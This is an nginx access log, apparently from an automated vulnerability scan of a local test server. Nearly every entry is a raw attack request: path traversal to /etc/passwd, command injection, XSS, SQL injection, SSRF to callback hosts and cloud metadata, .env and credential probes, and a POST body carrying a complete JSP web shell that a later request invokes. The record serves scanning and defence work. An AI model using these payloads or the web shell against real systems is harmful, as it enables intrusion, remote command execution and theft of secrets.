HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fcgi-bin/wgsetcgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jquery-file-upload/server/php/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compile.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/opc/v1/instance HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.314","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22phar://../storage/logs/laravel.log/test.txt\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/default.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console-selfservice/SelfService.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_darcs/prefs/binaries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /httptrace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/projects HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/nuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV\x0D\x0AOPTION=S3WYOSWLBSGr\x0D\x0AcurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\x0D\x0A= WUghPB3szB3Xwg66 the CREATEDATE\x0D\x0ArecordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6\x0D\x0AoriginalFileId = wV66\x0D\x0AoriginalCreateDate = wUghPB3szB3Xwg66\x0D\x0AFILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs\x0D\x0AneedReadFile = yRWZdAS6\x0D\x0AoriginalCreateDate IZ = 66 = = wLSGP4oEzLKAz4\x0D\x0A<%@ page language=\x22java\x22 import=\x22java.util.*,java.io.*\x22 pageEncoding=\x22UTF-8\x22%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+\x22\x5Cn\x22);}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if(\x22x\x22.equals(request.getParameter(\x22pwd\x22))&&!\x22\x22.equals(request.getParameter(\x2229KBxeUqz5sO1rNCXnjpfoX49NG\x22))){out.println(\x22
\x22 +excuteCmd(request.getParameter(\x2229KBxeUqz5sO1rNCXnjpfoX49NG\x22)) + \x22
\x22);}else{out.println(\x22:-)\x22);}%>6e4f045d4b8506bf492ada7e3390d7ce","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /seeyon/htmlofficeservlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dev/tests/functional/credentials.xml.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /getFavicon?host=http://ca28bc0smpvbbtig07h0c6ap3rr8mmdo7.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktop/container/landing.jsp?locale=en_US HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/httptrace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?aiowpsec_do_log_out=1&after_logout=https://attacker.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx_status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/test123456.jsp?pwd=asasd3344&29KBxeUqz5sO1rNCXnjpfoX49NG=ipconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /init.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dev/tests/functional/etc/config.xml.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor_tools/module?type=files/admin\x22>¶ms=filetype=images HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Home/uploadify/fileList?type=.+&path=../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.cgi?next_file=debug.htm&x=currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"type=login&loginCode=YWRtaW4=&pwd=MDAwMDAw&","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /c6/Jhsoft.Web.login/AjaxForLogin.aspx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.example HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantis/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /startup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__clockwork/latest HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"url=https://127.0.0.1:443@ca28bc0smpvbbtig07h0kmrh1xcwyxqzm.oast.pro\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugins/servlet/gadgets/makeRequest HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"29KBxhq8GxJrf6IJ4WtRpKUhri9.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"type=url&data=http%3A%2F%2Fca28bc0smpvbbtig07h0stubt6camsmkk.oast.pro%2F&xmlaction=preview&node=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.stage HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantisBT/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:10 +0000","request_body":"username=dd' or extractvalue(0x0a,concat(0x0a,810663301*872821376))#&password=dd&submit=+%B5%C7+%C2%BC+\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?m=member&f=login_save HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} 